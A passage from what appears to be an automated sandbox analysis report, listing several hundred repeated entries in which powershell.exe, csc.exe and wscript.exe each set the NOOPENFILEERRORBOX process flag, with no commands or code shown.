                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
